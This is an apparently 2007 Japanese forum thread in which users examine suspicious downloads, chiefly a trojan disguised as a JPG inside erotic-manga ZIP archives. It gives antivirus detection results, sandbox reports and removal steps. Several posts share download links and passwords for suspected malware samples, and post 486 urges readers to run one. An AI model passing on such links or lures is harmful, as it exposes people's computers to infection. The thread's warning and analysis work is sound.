         !   /     `'''''''´  `ヽ   i
          |  /              }  |
        _⊥< ,,,,,,,,__           |  !
        /r\f‐┴─-<_  ≦二ヽ__レ'!
       !ノ!. ヽ 厂二二┐ ̄r─‐-、 /⌒!
       l ヽ   !ヽ__//^ヽ!  ̄` ノ/iヽ /
       \__! `ー--/!  \ヽ--'/├'/
         |   / L _ __)ヽ ̄  /‐'
         ,┤ i〈 、_____, 〉 /
        /  !  ヽ\+┼┼+/  /  誰かワシを呼んだか?
      __/   ヽ    `ー‐‐'´ /
  , -‐''" i    \       人
-''~     |    \`ー----‐'´! iヽ、
       ヽ      \     /  i  `ヽ、

485 :名無しさん@お腹いっぱい。:2007/02/15(木) 22:47:50
_           __/ 
_  / __   /   ̄/   .へ       |    .へ              |.  |
   /. __|       /.  /  \    _ノ    /  \  へ .へ ./  _ノ  │
__ノ  __|     /   /    \  ̄ |   /    \  `´ `´   ̄ |.   ・

            _ 、 -──¬‐-、
           /           \
          /             ヽ
         /   ,----、   __    ヽ
         !   /     `'''''''´  `ヽ   i
          |  /              }  |
        _⊥< ,,,,,,,,__           |  !
        /r\f‐┴─-<_  ≦二ヽ__レ'!
       !ノ!. ヽ 厂二二┐ ̄r─‐-、 /⌒!
       l ヽ   !ヽ__//^ヽ!  ̄` ノ/iヽ /
       \__! `ー--/!  \ヽ--'/├'/
         |   / L _ __)ヽ ̄  /‐'
         ,┤ i〈 、_____, 〉 /
        /  !  ヽ\+┼┼+/  /  あんまワシを苛めんといてや〜
      __/   ヽ    `ー‐‐'´ /
  , -‐''" i    \       人
-''~     |    \`ー----‐'´! iヽ、
       ヽ      \     /  i  `ヽ、

486 :実行してください><:2007/02/15(木) 22:50:31
http://up3.viploader.net/mini/src/viploader110564.zip
【ノートン】インターネットセキュリティ Ver.107【2007】
356 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/02/15(木) 21:32:53
>>321
試しにマイクロソフトが無料配布している、Windowsエクスプローラのコンテクスト・メニューから
ZIPの圧縮、解凍ができるようになるプログラムで解凍してみたら、それだけでimg_01_0.jpg.exeが
実行されてしまいまつた。
Windowsアップデートはちゃんとやっているけど、ZIPの圧縮、解凍ができるようになるプログラムは
アップデートされていなくて、バッファ・オーバーフローの脆弱性があるバージョンということでつね。
ちなみにimg_01_0.jpg.exe実行後は姿が消えてしまい、正常なjpgファイルしか見えなくなりまつた。
そしてアンチウイルスが強制的に無効状態になりまつた。

357 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/02/15(木) 21:35:03
>ちなみにimg_01_0.jpg.exe実行後は姿が消えてしまい、正常なjpgファイルしか見えなくなりまつた。

感染していることを気付かせない細工もしているウイルスなんだな。

358 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/02/15(木) 21:42:58
WinRAR3.62 Noah3.195 Lhaplus1.54β1で解凍してみたが
img_01_0.jpg.exeはそのままフォルダ内に残っている。
しっかし、Windows純正品がだめってなんなんだよ。

360 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/02/15(木) 22:25:45
>>356
マイクロソフト純正のもので解凍すると、それだけで自動感染するということは、
あちこちのスレにそのサンプルのリンクが貼ってあるから、
まだ対応できているアンチウイルスも少ないので、大量に感染者を出しているんだろうなぁ。

361 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/02/15(木) 22:36:12    New!!
しかもそのサンプルは、ウイルスの中で最も悪質なキンタマ系亜種だという書き込みを見たぞ。>他のスレで。
これは自治スレにも書いて注意を促した方がいいかもな。

487 :名無しさん@お腹いっぱい。:2007/02/15(木) 22:59:42
ええ〜ほんとかよこれ

信じられんな〜

488 :名無しさん@お腹いっぱい。:2007/02/15(木) 23:18:06
AntiVir 7.3.1.37 02.15.2007 TR/Spy.Banker.cjo
Authentium 4.93.8 02.15.2007 no virus found
Avast 4.7.936.0 02.14.2007 no virus found
AVG 386 02.14.2007 no virus found
BitDefender 7.2 02.15.2007 no virus found
CAT-QuickHeal 9.00 02.15.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 02.15.2007 no virus found
DrWeb 4.33 02.15.2007 no virus found
eSafe 7.0.14.0 02.15.2007 Win32.Delf.ce
eTrust-Vet 30.4.3400 02.15.2007 no virus found
Ewido 4.0 02.14.2007 no virus found
Fortinet 2.85.0.0 02.15.2007 no virus found
F-Prot 4.2.1.29 02.15.2007 no virus found
F-Secure 6.70.13030.0 02.15.2007 Trojan-Proxy.Win32.Delf.ce
Ikarus T3.1.0.31 02.15.2007 Email-Worm.Win32.Bagle.BR
Kaspersky 4.0.2.24 02.15.2007 Trojan-Proxy.Win32.Delf.ce
McAfee 4963 02.14.2007 no virus found
Microsoft 1.2204 02.15.2007 no virus found
NOD32v2 2062 02.15.2007 no virus found
Norman 5.80.02 02.15.2007 no virus found
Panda 9.0.0.4 02.15.2007 no virus found
Prevx1 V2 02.15.2007 no virus found
Sophos 4.14.0 02.13.2007 no virus found
Sunbelt 2.2.907.0 02.15.2007 VIPRE.Suspicious
Symantec 10 02.15.2007 no virus found
TheHacker 6.1.6.057 02.14.2007 no virus found
UNA 1.83 02.14.2007 no virus found
VBA32 3.11.2 02.14.2007 no virus found
VirusBuster 4.3.19:9 02.15.2007 no virus found

489 :名無しさん@お腹いっぱい。:2007/02/15(木) 23:24:26
こういうのはカスペとAntiVirがホント強いな
強いというか速いというか

490 :名無しさん@お腹いっぱい。:2007/02/15(木) 23:54:49
img_01_0.jpg.exeを実行しても本体消えんぞ
system32内に別名同一ファイルがコピーされレジストリ追加でOS起動時に実行される
砂箱とレジストリモニタ使ってりゃアンチウイルスなくても普通に感染しない
案外つまらないトロイだった。ガセ臭い情報も散乱してるな。製作者本人が吹聴してんのかね

491 :名無しさん@お腹いっぱい。:2007/02/16(金) 00:05:10
>>490
あとpfファイルが追加されてエラーメッセージがでたぐらいだね

><←この顔文字のやつがあやしい



492 :名無しさん@お腹いっぱい。:2007/02/16(金) 00:13:22
Symantecもうちょっと頑張らなきゃ!有料でしょ!?もう。

493 :名無しさん@お腹いっぱい。:2007/02/16(金) 00:21:03
・・・バスターもマカフィーもNOD32も有料です

494 :名無しさん@お腹いっぱい。:2007/02/16(金) 00:23:19
Antivir優秀だねえ。フリーなのが怖いくらい。

495 :名無しさん@お腹いっぱい。:2007/02/16(金) 00:25:37
バスター、マカフィー、NOD32、ノートン、有料ならもっと頑張れ!

496 :名無しさん@お腹いっぱい。:2007/02/16(金) 00:29:28
アンチウイルスを殺されるのか。怖いな。

497 :名無しさん@お腹いっぱい。:2007/02/16(金) 01:56:07
>>490
作者臭いのがニュー速に居たぞ。
もうdat落ちしてるけど
http://news23.2ch.net/test/read.cgi/news/1171526120/922-

 922  Name: 番組の途中ですが名無しです  [] Date: 2007/02/15(木) 20:04:37  ID: OjZb+N420  Be:
(省略)

 954  Name: 番組の途中ですが名無しです  [] Date: 2007/02/15(木) 20:18:11  ID: OjZb+N420  Be:
    おまえらワロタ
    >>922
    「150秒ごとにニュー速に>>1と書き込むソフト」の失敗作
    テストしないでばら撒いたからエラーが出ることにあとで気づいた
    つまり無害

 963  Name: 番組の途中ですが名無しです  [] Date: 2007/02/15(木) 20:23:00  ID: OjZb+N420  Be:
    >>960
    あ?Delphi様は容量食うんだよハゲ
    アスパックなら200K切るけどプロテクトにしないとウイルス判定食らうからね

 966  Name: 番組の途中ですが名無しです  [] Date: 2007/02/15(木) 20:25:35  ID: OjZb+N420  Be:
    >>964
    先生とバスターはスルーじゃないの?
    俺は対策ソフト入れてないからわからん

498 :名無しさん@お腹いっぱい。:2007/02/16(金) 02:20:40
>>497
逮捕クルコレwwwwwww
研究目的でばらまいたりしないなら問題ないだろうがばらまいたらタイーホ

499 :名無しさん@お腹いっぱい。:2007/02/16(金) 02:24:59
昨日からいろんなスレに貼り付けていたのは作者だったのか

500 :名無しさん@お腹いっぱい。:2007/02/16(金) 02:34:17
インターネットが発明されて以来抱えている病原菌の素みたいなもんだな。
こんな奴が世界に何万人もいるというのが現実。

501 :名無しさん@お腹いっぱい。:2007/02/16(金) 20:19:21
>>490
興味をひかれたんでwindows既定で.zipを展開してみた

ファイルをコピーできませんとエラーメッセージがでて解凍後のファイルは0byteになった
.jpg.exeだけがなぜか消えた ((((;゜Д゜)))











ただそれだけ
アーカイバの脆弱性をねらったんだろうけど.exe実行するとこまではいかなかったみたいねw
kiddy 乙って感じ?w



502 :名無しさん@お腹いっぱい。:2007/02/16(金) 20:36:24
777 774 2007/02/14(水) 19:25:08
ttp://kuro33.sakura.ne.jp/kuro-up/
のkuro_0016.zip ORIG story   .zipがそれです
DLパスは1111
現在virustotalでチェック中
他スレからで悪いんだどこれ実行したところよくわからないんだけどウィルス感染?

503 :名無しさん@お腹いっぱい。:2007/02/16(金) 20:44:39
きょうはパス

↓が踏んでくれるであろう

504 :名無しさん@お腹いっぱい。:2007/02/16(金) 20:48:37
やってやるか

505 :名無しさん@お腹いっぱい。:2007/02/16(金) 21:16:35
こういう時こそインスコマンが出て来てくれよ

506 :名無しさん@お腹いっぱい。:2007/02/16(金) 21:28:50
>>502
これ15メガ以上あるからvirustotalに送れなくね?

507 :名無しさん@お腹いっぱい。:2007/02/16(金) 22:16:27
>>502
実行ファイル7z圧縮したら131KBになったぞwwwwwwwww

508 :インスコマン ◆qlwUrCXXtM :2007/02/16(金) 22:29:13
誰か踏む?

509 :名無しさん@お腹いっぱい。:2007/02/16(金) 22:29:55
7z,rarで提出してみたがどこもヒットしなかった。

510 :名無しさん@お腹いっぱい。:2007/02/16(金) 22:36:55
rarで提出したらVBA32だけヒットしてた。
suspected of RAR.MailBomb

511 :名無しさん@お腹いっぱい。:2007/02/16(金) 22:37:15
VMware入れてないからパス。

512 :名無しさん@お腹いっぱい。:2007/02/16(金) 22:40:25
このスレ久々に浮上してきたな

513 :名無しさん@お腹いっぱい。:2007/02/16(金) 22:43:03
もっと刺激的な物はないのか、貴様らw

514 :名無しさん@お腹いっぱい。:2007/02/16(金) 22:45:27
俺もVMware Playerとかいれてねーから無理だ

515 :名無しさん@お腹いっぱい。:2007/02/16(金) 22:47:20
いれてるけどパス

516 :名無しさん@お腹いっぱい。:2007/02/16(金) 23:20:26
>>508
ONEGAI

517 :名無しさん@お腹いっぱい。:2007/02/16(金) 23:25:06
>>502
os9だからふんでも良いがダウンできない。

518 :名無しさん@お腹いっぱい。:2007/02/16(金) 23:35:11
2kで実行したが何も起こらなかった
何か起こったかもしれんがレジストリは参照も書き換えもなかった

519 :インスコマン ◆qlwUrCXXtM :2007/02/16(金) 23:40:08
実行したけどコマンドプロントが一瞬出て現在何もなし。
XP

520 :インスコマン ◆qlwUrCXXtM :2007/02/16(金) 23:46:09
なんか何にもなさそう・・・。

521 :名無しさん@お腹いっぱい。:2007/02/17(土) 00:02:50
俺も仮想PCでやったけどなんもなかったよ

522 :名無しさん@お腹いっぱい。:2007/02/17(土) 00:09:16
よすれあげ

523 :名無しさん@お腹いっぱい。:2007/02/17(土) 00:10:05
よ・・・良スレ・・・w

524 :名無しさん@お腹いっぱい。:2007/02/17(土) 00:30:19
ニュー即にあったこのZIPファイルなんだけど、誰かWinXPの解凍機能をアップデートしていない状態で、その機能を使って解凍することできない?

パス
saebaxyz
http://s-io.net/up/3/_/jump/1171633749943399.6xOn8A

525 :名無しさん@お腹いっぱい。:2007/02/17(土) 03:16:44
ttp://www.vipper.org/vip444637.zip.html
pass:news

↑を間違って踏んでしまいました。どういう実行ファイルなのでしょうか?

526 :名無しさん@お腹いっぱい。:2007/02/17(土) 03:26:12
>>525
どこかで見たな。ウイルスじゃないか?。
解凍ファイルに*****.jpg.exe
があるなら、それ。

527 :名無しさん@お腹いっぱい。:2007/02/17(土) 03:26:39
>>525
TR/Spy.Banker.cjo または Trojan-Proxy.Win32.Delf.ce
詳細はしらん

528 :名無しさん@お腹いっぱい。:2007/02/17(土) 03:29:02
一昨日の物じゃないか
ネタが古いよ

529 :526:2007/02/17(土) 03:29:05
途中で送信してしまった。
それはウイルス。

AVGとAntiVirは対応してるらしい。

530 :名無しさん@お腹いっぱい。:2007/02/17(土) 03:36:35
まだばら撒いてるのか。アホだなあ。


531 :名無しさん@お腹いっぱい。:2007/02/17(土) 03:41:38
MD5一致。>>486- のファイルと同じ。

532 :名無しさん@お腹いっぱい。:2007/02/17(土) 08:19:20
Avast!反応無し\(^O^)/オワタ

533 :名無しさん@お腹いっぱい。:2007/02/17(土) 22:12:43
結局>>525はどうなったんだ?
いろいろ情報が右往左往してるがどうやら失敗作で実害はさほどなさそう(責任は持たんが)なのでまぁ安心しれ。

それよりantivirは偉大だな

534 :名無しさん@お腹いっぱい。:2007/02/17(土) 22:33:30
>>533
アホ臭くてまじめに検証してないんだよなあ。

・・・ニュー速に大量爆撃されてる荒らしと発生時期が合致してるような気がしてきたぞ。
ちょっと踏んでくるノシ

535 :名無しさん@お腹いっぱい。:2007/02/17(土) 22:40:06
>>534
人柱乙。

オレも踏んでみたら外部にアクセス試みようとしたが拒否ったらそれ以来目に見えた活動が見られないんだが。
こういうときにスキルがあるヤツはうらやましいぜ!

536 :名無しさん@お腹いっぱい。:2007/02/17(土) 23:12:47
踏んできた。通信は無し。
ただ、別スレで報告のあった[ Not Implemented ]ってダイアログではなく、
[Connection refused (Error #10061)]と出た。
俺は4種類のエロ漫画zipアーカイブを持っててその中の.exeは全て同一だったんだが、
いろんなタイプのをそこら中でばら撒いてるのか、それとも環境の違いによるものか。

>スキルがあるヤツはうらやましいぜ!
えへへ。間違えてAdmin権限で踏んじゃったorz

537 :名無しさん@お腹いっぱい。:2007/02/17(土) 23:15:36
http://oshiete1.goo.ne.jp/qa2756449.html
だれかエロ漫画のせいだって教えてきてあげてw

538 :名無しさん@お腹いっぱい。:2007/02/18(日) 01:30:14
ノートンでも反応なし。 VM(Win98SE)で踏んだところ。
>>536 と同じようなダイアログが何かの拍子に出現する。

だれか、ノートンに送った?

539 :名無しさん@お腹いっぱい。:2007/02/18(日) 02:17:04
マカフィ使いなオレは試すまでもなく未対応だぜ!!

540 :名無しさん@お腹いっぱい。:2007/02/18(日) 03:10:29
あやしいファイルの動きを詳しく見たければ砂箱つかうべし!よーくわかる。

541 :名無しさん@お腹いっぱい。:2007/02/18(日) 04:22:09
>>540
はぁ?砂箱で動きが詳しく見れる?何でこんな低知能がレスしてんの?

542 :名無しさん@お腹いっぱい。:2007/02/18(日) 04:49:23
>>538
virustotalに送信するとそこから各ウイルス対策ソフトメーカーに行くようになってる。
トレンドマイクロは参加してないので個人的に送ってるけど。

543 :名無しさん@お腹いっぱい。:2007/02/18(日) 05:44:57
virustotal経由での対応は期待しないほうがいい
数ヶ月かかってる希ガス
個別に送ったほうが速い

544 :名無しさん@お腹いっぱい。:2007/02/18(日) 05:55:43
んでも、こんな極東の掲示板で撒かれたつまらんウザイウェアにもかなりのベンダーが対応したやん。
俺が投げた時はKasperskyとF-secure以外はスルーだったし。
つーかこの二つは早すぎ。新種の原田にも速攻で対応してたし。

545 :名無しさん@お腹いっぱい。:2007/02/18(日) 06:31:44
>>544
それはセキュ版の住人が各ベンダーに速攻おくったからでしょw
俺が投げた時はantivirがヒューリスティックで反応してたぐらいだった
それからカスペとNODはp-desでつくられたやつをヒューリステイックと既知のシグネチャでほとんど見抜ける
ny厨は乗り換えたほうがいい

546 :名無しさん@お腹いっぱい。:2007/02/18(日) 07:48:18
>>544
(´・ω・`) AntiVirも速いけど休日はやってないみたいだな。
新種送ったけど平日のときは速かったが休日はまったくねえw

547 :名無しさん@お腹いっぱい。:2007/02/18(日) 08:04:49
ヒューリステイックは弱いが対応が早いカスペ
ヒューリステイックは強いが対応が遅いNOD
うーむ・・・

548 :名無しさん@お腹いっぱい。:2007/02/18(日) 10:44:32
>>539
マカフィには投げつけておいた

549 :名無しさん@お腹いっぱい。:2007/02/18(日) 11:42:01
http://n.limber.jp/n/T9aXgc6HD
P:0218

これ頼む

550 :名無しさん@お腹いっぱい。:2007/02/18(日) 12:06:32
>>549
中身は漫画のスキャンでウィルスは無し。

551 :名無しさん@お腹いっぱい。:2007/02/18(日) 15:20:47

■[他] だましえ

http://file.beautynet.co.kr/updata/bbs/board_1613/13581.jpg

Firefoxでは怖くないが、IEでは怖い。

ヒント:おもちかえりぃ


だれかこの謎わかる?


552 :名無しさん@お腹いっぱい。:2007/02/18(日) 15:30:05
Ctrl+Aだろ。
知らんけど。

553 :名無しさん@お腹いっぱい。:2007/02/18(日) 15:36:36

天才!!!
正解!!!


554 :名無しさん@お腹いっぱい。:2007/02/18(日) 15:43:04
Ctrl+A
http://2ch-news.net/up/up42881.jpg

555 :名無しさん@お腹いっぱい。:2007/02/18(日) 15:48:54
うぜえな。何年も前に流行ったトリックだ。

556 :名無しさん@お腹いっぱい。:2007/02/18(日) 17:43:42
そのわりにはあんま見たこと無いな

557 :名無しさん@お腹いっぱい。:2007/02/18(日) 18:12:10
NOD32、AntiVirでも検出できないウイルス
http://www.virustotal.com/vt/en/resultadof?3d00c9371ecc4e1fe3c57f961afcca3d

558 :名無しさん@お腹いっぱい。:2007/02/18(日) 18:13:03

引用元

http://d.hatena.ne.jp/lumin/20070130



559 :名無しさん@お腹いっぱい。:2007/02/18(日) 23:34:48
>>538
AntiVir 7.3.1.37 02.18.2007 TR/Spy.Banker.cjo
Authentium 4.93.8 02.16.2007 no virus found
Avast 4.7.936.0 02.18.2007 no virus found
AVG 386 02.17.2007 Proxy.KPA
BitDefender 7.2 02.18.2007 no virus found
CAT-QuickHeal 9.00 02.16.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 02.18.2007 no virus found
DrWeb 4.33 02.18.2007 no virus found
eSafe 7.0.14.0 02.18.2007 Win32.Delf.ce
eTrust-Vet 30.4.3410 02.18.2007 no virus found
Ewido 4.0 02.18.2007 Proxy.Delf.ce
Fortinet 2.85.0.0 02.18.2007 W32/Delf.CE!tr
F-Prot 4.2.1.29 02.16.2007 no virus found
F-Secure 6.70.13030.0 02.17.2007 Trojan-Proxy.Win32.Delf.ce
Ikarus T3.1.0.31 02.18.2007 Email-Worm.Win32.Bagle.BR
Kaspersky 4.0.2.24 02.18.2007 Trojan-Proxy.Win32.Delf.ce
McAfee 4965 02.16.2007 no virus found
Microsoft 1.2204 02.18.2007 no virus found
NOD32v2 2068 02.18.2007 Win32/TrojanProxy.Delf.CE
Norman 5.80.02 02.16.2007 no virus found
Panda 9.0.0.4 02.18.2007 no virus found
Prevx1 V2 02.18.2007 no virus found
Sophos 4.14.0 02.18.2007 no virus found
Sunbelt 2.2.907.0 02.17.2007 VIPRE.Suspicious
Symantec 10 02.18.2007 Backdoor.Trojan
TheHacker 6.1.6.059 02.16.2007 Trojan/Proxy.Delf.ce
UNA 1.83 02.16.2007 no virus found
VBA32 3.11.2 02.17.2007 Trojan-Proxy.Win32.Delf.ce
VirusBuster 4.3.19:9 02.17.2007 no virus found


560 :名無しさん@お腹いっぱい。:2007/02/20(火) 03:34:20
>>536


[ Not Implemented ]の者です。
感染源はそのファイルか分かりませんが、同じVIP系アップローダーで感染したので、それかもしれません。
エロ漫画だったはずですが、題名も内容も忘れてしまいました。商業誌だったのは確かですが。
もうかなりのセキリュティソフト試してみましたが、解決せず、これは初期化かもわからんねってかんじっす。
そういえばシステムの復元なんて手もありましたっけ。


>>559

ノートン先生の最新版ダウンロードしてフルスキャンしてみましたが、反応せず。
もう、なにがなんだか( ´Д`)=з

561 :名無しさん@お腹いっぱい。:2007/02/20(火) 09:53:59
>>560
エロマンガにつられてexeを実行してしまった人へ
※以下OSがXP前提の話

C:\WINDOWS\system32 に
IMJPMIG69.EXE というファイルがあったら削除

「スタート」→「ファイル名を指名して実行」→「regedit」
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に IMJPMIG69.EXE という名前があったら削除

再起動して様子見

※上記の内容がよく分からない、該当ファイルが見当たらないという場合
1.システムの復元もしくはOSの再インストール
2.回線引っこ抜いて寝る

562 :名無しさん@お腹いっぱい。:2007/02/20(火) 09:57:12
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc10.2ch.net/test/read.cgi/sec/1091174837/810

563 :名無しさん@お腹いっぱい。:2007/02/20(火) 09:59:17
ノートンじゃねえので試せよ。ここは初心者相談スレじゃないぞ?

564 :名無しさん@お腹いっぱい。:2007/02/20(火) 11:09:57
エロマンガ、パスは全部vip

ttp://uploader.xforce.jp/src/xF3227.zip.html [Low] 膨らみ始めたエッチな年頃
ttp://s-io.net/up/3/_/jump/1171863544626858.dkTitq 蟲が来るぞ
ttp://s-io.net/up/6/_/jump/1171863726611524.mcJDZu 村
ttp://up3.viploader.net/mini/src/viploader112335.zip.html [いーむす・アキ]渚の乙女達
ttp://upload.jerog.com/up/moe005576.zip.html [みさくらなんこつ] ヒキコモリ健康法

これ頼む

565 :名無しさん@お腹いっぱい。:2007/02/20(火) 11:28:51
鑑定スレじゃねえ。VIPでやれ。

566 :名無しさん@お腹いっぱい。:2007/02/20(火) 11:35:20
>>564
ttp://www.dotup.org/uploda/www.dotup.org1110.txt.html

567 :名無しさん@お腹いっぱい。:2007/02/21(水) 11:56:09
>>561

親切にありがとうございます。おかげさまで解決しました。


>>562 >>563


スレ汚し申し訳ない。

568 :名無しさん@お腹いっぱい。:2007/02/21(水) 16:32:06
ttp://up3.viploader.net/mini/src/viploader112748.zip.html
中のexeをおねげえします
解凍pass = qwe


569 :名無しさん@お腹いっぱい。:2007/02/21(水) 16:57:17
>>568
ttp://vista.crap.jp/img/vi7204447336.png
システムファイルが幾つか削除されて上のウィンドウが出た。

570 :名無しさん@お腹いっぱい。:2007/02/21(水) 17:01:07
>>569
PCの挙動はどうだい、おかしい所ある?

571 :名無しさん@お腹いっぱい。:2007/02/21(水) 17:39:02
ネットに繋がらなくなった。VirusTotalに送ってみたけど、何処も対応してないみたい。
ttp://www.virustotal.com/vt/en/resultadof?f8610259efb64a081da272ad5fef38c8

572 :名無しさん@お腹いっぱい。:2007/02/21(水) 17:50:28
>>568
中の実行ファイル、日時が2001年5月とかだが。
これって新物なのかい?

573 :570:2007/02/21(水) 17:53:30
最後まで進めると
「システムへの影響はありません、これはジョークソフトです」
と出るけどどうなんだろ、俺のパソは特に問題無く普通に動いてる

574 :名無しさん@お腹いっぱい。:2007/02/21(水) 17:58:33
おまえらさあ、あやしいファイルを実行するのはいいけどよ、
てめえの個人情報が万が一漏れてどうなろうと知ったことではないが
外に漏れたら他人に損害を与えるような情報ファイルは絶対に置いておくなよ。

575 :名無しさん@お腹いっぱい。:2007/02/21(水) 18:01:50
そんな環境で踏んでるやつは馬鹿だろww

576 :名無しさん@お腹いっぱい。:2007/02/21(水) 18:02:23
さらなる人柱求む

577 :名無しさん@お腹いっぱい。:2007/02/21(水) 18:04:36
>>575
わざわざ踏んでる時点で馬鹿確定なんだけどなw

578 :名無しさん@お腹いっぱい。:2007/02/21(水) 18:06:44
高卒でも、モン卒でもべつにいいじゃん。
バカ同士仲良くしようぜ!

579 :名無しさん@お腹いっぱい。:2007/02/21(水) 18:08:16
FAKEか・・・・

580 :名無しさん@お腹いっぱい。:2007/02/21(水) 18:47:36
こんなんだし。インチキくせえな。

ウィルスのインストールを開始します B "#????$ Form2 & ' ( 2 5-   J  ?  6  D F?.   Command1
ウィルス情報 (Xッ・ ?・   bar2 ? MSComctlLib.ProgressBar h・・?  -LB P   !C4   E*  ツ  喚・    
 ?? ?サE    ・ォ         ????????l・ ゙・ l・ ?   Label3 (ッ? ?.   Label2 code         : h(マ? ?A   Label1 !
 virus name :     J_happy birthday hH・? ?   ?フ1 ヒワ9・aE聴P5]{オ蠎? 儂沫oハ・・Oュ3
冉マキ ェ `モ・                                    O     Form1
ウィルス情報 B "#????$ Form1 & ' ( 5-   J    ・  D F?%   Command1 O K hソw ?:   Label7
あらゆるデータを削除します タg? ?P   Label6 0 それにより以後動作させたプログラムをすべて破壊し
 タ?・? ?J   Label5 * システムの内部に特殊なコードを進入させます


581 :名無しさん@お腹いっぱい。:2007/02/21(水) 19:40:02
ttp://zetubou.mine.nu/timer/file/bomber36292_h5.exe

582 :名無しさん@お腹いっぱい。:2007/02/21(水) 20:14:07
>>581
デコードできん。コーデック入れるのもめんどいからパス。

583 :名無しさん@お腹いっぱい。:2007/02/21(水) 20:39:36
>>581
解凍したら拡張子rmの動画だった
RealPlayer入れてないから確認できんけど問題ないだろ。

584 :インスコマン ◆qlwUrCXXtM :2007/02/21(水) 20:52:57
>>568
画像A
ttp://www.nya-taloda.jpn.org/2MB/src/up2605.png
ttp://www.nya-taloda.jpn.org/2MB/src/up2606.png

問題なしっぽい

585 :名無しさん@お腹いっぱい。:2007/02/21(水) 22:14:40
ジョークソフトだな。

586 :名無しさん@お腹いっぱい。:2007/02/22(木) 00:17:11
なんかnyだかshareだかでPS2用のトロイが流れたらしいな。

587 :名無しさん@お腹いっぱい。:2007/02/22(木) 00:24:03
>>586
ただの捏造&メモカ消去プログラム

588 :名無しさん@お腹いっぱい。:2007/02/22(木) 00:24:40
それをトロイの木馬というんじゃないのか。

589 :588:2007/02/22(木) 00:27:24
なんか寝ぼけてた。

590 :名無しさん@お腹いっぱい。:2007/02/22(木) 00:29:34
( ゚д゚)エ?

591 :名無しさん@お腹いっぱい。:2007/02/22(木) 00:29:39
ひぐらしか。
なんかPCで実行するとキャッシュとダウンフォルダが削除されるとか喚いていたが。
実行するってなんだ? 実行ファイルでも付いてんのか?

592 :名無しさん@お腹いっぱい。:2007/02/22(木) 21:12:20
>>591
デーモンでマウントしたりするのとかかな?かな?

593 :名無しさん@お腹いっぱい。:2007/02/23(金) 05:41:46
やっべ。復元ソフトなんか良いのないか?
とりあえず1回使えればおk。フリーか体験版でも良いんだが。

怪しいファイル寺子屋ス

594 :名無しさん@お腹いっぱい。:2007/02/23(金) 06:19:12
全然スレの趣旨と関係ねえじゃねえか。

595 :名無しさん@お腹いっぱい。:2007/02/24(土) 17:15:53
AVGのスレから誘導されてきました。
ベクターのこの「キーボード」というアプリがウイルスと判定されます。
  http://www.vector.co.jp/soft/win95/art/se204371.html
>>3のJotti's malware scanでスキャンしてみましたが、いくつかのエンジンでウイルスと判定されます。
こいつはウイルスなんでしょうか?

作者のHPもあって、日記ソフトのスレでもそれなりの人気はあるソフトの作者さんでも
あるのですが、
「キーボード」のReadmeには
 ちなみに、このソフトは起動させておけばずっと音が出るので、
 そのまま文章などを書くとジャラジャラ鳴って楽しいです♪
とか書いてあります。
無問題ですか?

596 :名無しさん@お腹いっぱい。:2007/02/24(土) 20:40:57
この類の誤検知じゃないかな
ttp://lhsp.s206.xrea.com/works/info.html

このアプリも「Hot Soup Processor」を利用している模様

それでも実行して試す他は無いと思うが、それは他の人に任す

597 :名無しさん@お腹いっぱい。:2007/02/24(土) 20:52:39
一応貼っとこう
結果だけ見るとマルウェアにしか見えないけど…

・keyboard.exe
ttp://www.virustotal.com/vt/en/resultadof?f4ccd807882d68103c13c064b18958b1
ttp://fileinfo.prevx.com/fileinfo.asp?PXC=253b1995557

・Hspmidi.dll
ttp://www.virustotal.com/vt/en/resultadof?f6b70175874b6257570d2cfa3fe7c98a

598 :名無しさん@お腹いっぱい。:2007/02/25(日) 06:38:42
HSPの誤検出

599 :名無しさん@お腹いっぱい。:2007/02/25(日) 17:02:21
HSPでウィルス作られたんだ。
凄いじゃない、HSP。

600 :名無しさん@お腹いっぱい。:2007/02/25(日) 19:45:57
http://www.jetcityorange.com/toys/MosquitoRingtone.wav

これ聞こえるひとと聞こえないひとがいるらしい


601 :名無しさん@お腹いっぱい。:2007/02/25(日) 22:50:51
>>600
波形確認してみたが、こりゃコンピューターで合成して作った音だね。
無理やり可聴域まで引っ張って聞いてみたけど、完全なプログラムによるノイズです。

602 :名無しさん@お腹いっぱい。:2007/02/25(日) 22:53:00
聞こえなかったのか?

603 :名無しさん@お腹いっぱい。:2007/02/25(日) 22:56:44
開けなかったけど高周波の音の予感
20代くらいから聞こえなくなるってやつ

604 :名無しさん@お腹いっぱい。:2007/02/25(日) 22:57:06
>>602
聞こえなかったね。
音声信号が波じゃなくて細かいDOTで記録されてた。
あまり見た事の無いノイズパターンだな、完全に規則正しく並んでた。
あと基本録音レベルが低かったな。
波形の最適化をして、そのデータをCD-RWにでも焼いて、
ちゃんとしたAudio機器で聞けば、ホワイトノイズとして聞くことができるかもしれない。

605 :名無しさん@お腹いっぱい。:2007/02/25(日) 22:59:25
PCによっては音が出てないなんてこともあるかもね

606 :名無しさん@お腹いっぱい。:2007/02/25(日) 23:03:56
若者にしか聞こえない音 〜聴覚はけっこういい加減?〜
ttp://www.itmedia.co.jp/anchordesk/articles/0701/19/news029.html

17000 Hz Mosquito Cell Phone Ringtone
ttp://www.jetcityorange.com/MosquitoRingtone.html

607 :名無しさん@お腹いっぱい。:2007/02/25(日) 23:15:28
なんかちっちゃくピーて感じのが聞こえた

608 :名無しさん@お腹いっぱい。:2007/02/25(日) 23:15:37
あーボリュームあげたら聞こえるね
うぃんうぃんうぃんうぃんって感じの音
アナライザで信号拾った画面きゃぷったんで、貼っとくね
ttp://10e.org/elup/img/elup1707.jpg

609 :名無しさん@お腹いっぱい。:2007/02/26(月) 00:51:09
年取ってるから聞こえると嬉しい、物凄く不愉快な音なのにw

610 :名無しさん@お腹いっぱい。:2007/02/26(月) 03:06:22
>>609
マジで不快だよなこの音。
海外では着メロにしてるそうだ。
なぜなら年取った先生には聞こえないから

611 :名無しさん@お腹いっぱい。:2007/02/26(月) 09:25:38
ttp://vipperup.orz.hm/uploader/src/viup33860.zip.html

P 1111
cg.exe
html.exe
index.html.exe
はじめにお読み下さい.txt.exe

612 :名無しさん@お腹いっぱい。:2007/02/26(月) 14:43:49
フェイク

